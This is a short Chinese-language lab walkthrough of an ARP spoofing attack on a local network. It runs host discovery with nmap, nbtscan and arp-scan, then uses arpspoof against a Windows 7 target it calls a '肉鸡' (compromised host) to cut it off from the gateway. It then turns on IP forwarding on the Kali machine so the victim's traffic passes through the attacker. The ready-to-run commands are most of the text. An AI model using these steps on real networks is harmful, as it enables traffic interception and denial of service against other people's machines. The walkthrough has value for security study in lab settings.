实验环境:
攻击目标:局域网内终端
攻击机:kali(nat模式)
实战:
先进性局域网内主机扫描
┌──(root💀kali)-[~]
└─# nmap -sn 10.10.10.0/24
┌──(root💀kali)-[~]
└─# nbtscan 10.10.10.0/24
┌──(root💀kali)-[~]
└─# arp-scan 10.10.10.1-10.10.10.254
查看win7arp表
Win7中命令行持续ping 114.114.114.114 -t
┌──(root💀kali)-[~]
└─# arpspoof -i eth0 -t 10.10.10.132 10.10.10.2
10.10.10.132为肉鸡地址 10.10.10.2 为局域网的网关
此时看到win7 数据包超时 ,断网成功,说明欺骗网关成功
再次查看win7的arp路由表,我们可以发现mac地址欺骗成功为肉鸡mac地址
如果想让肉鸡联网则需要开启攻击机的路由转发功能(在kali机中再新建一个标签页输入路由转发开启命令)
┌──(root💀kali)-[~]
└─# echo 1 > /proc/sys/net/ipv4/ip_forward
(向ip_forward文件修改为1则是启动网络转发功能;默认关闭为0)
此时可以看到win7可以联网